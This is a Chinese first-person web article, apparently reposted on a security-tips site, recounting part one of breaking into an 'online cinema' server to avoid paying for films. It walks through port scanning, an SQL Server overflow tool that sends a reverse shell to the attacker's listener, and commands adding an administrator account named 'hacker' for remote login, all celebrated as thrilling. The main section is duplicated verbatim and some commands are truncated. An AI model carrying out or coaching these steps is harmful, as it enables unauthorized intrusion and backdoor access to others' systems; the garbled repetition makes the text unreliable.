黑客入侵“在线影院”全过程1
网络安全 2021-07-03 09:40www.168986.cn网络安全知识
最近对网上看电影比较感兴趣,于是登录至某“在线影院”。本以为是免费,谁知问我要账号和密码,我可不想为这个掏钱。怎么办?先探探路。对我而言,入侵的过程是充满乐趣的,它刺激着我大脑的每一根神经,让我兴奋无比。我喜欢体味这种思维无拘放荡的快感,我喜欢沉醉其中。这是黑客营人的风格。于是,X-Scan开始勤恳地跑在了我的桌面上。
破门久违的溢出工具
用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。
通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?
先开一个cmd窗口,祭出宝刀cat,在命令提示符下敲入“cat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.. 61.157.. 0”,其中218.147..是对方IP,61.157..是我自己的IP,回车后提示package sent suessful。再回过头去看看监听本地端口的cat,已经变成了C:\WinNT\system32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。
我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限在提示符下键入“ user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“ localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。
破门久违的溢出工具
用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。
通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?
先开一个cmd窗口,祭出宝刀cat,在命令提示符下敲入“cat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.. 61.157.. 0”,其中218.147..是对方IP,61.157..是我自己的IP,回车后提示package sent suessful。再回过头去看看监听本地端口的cat,已经变成了C:\WinNT\system32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。
我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限在提示符下键入“ user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“ localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。
上一篇:入侵藏在防火墙后面的机子
下一篇:黑客入侵“在线影院”全过程2
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座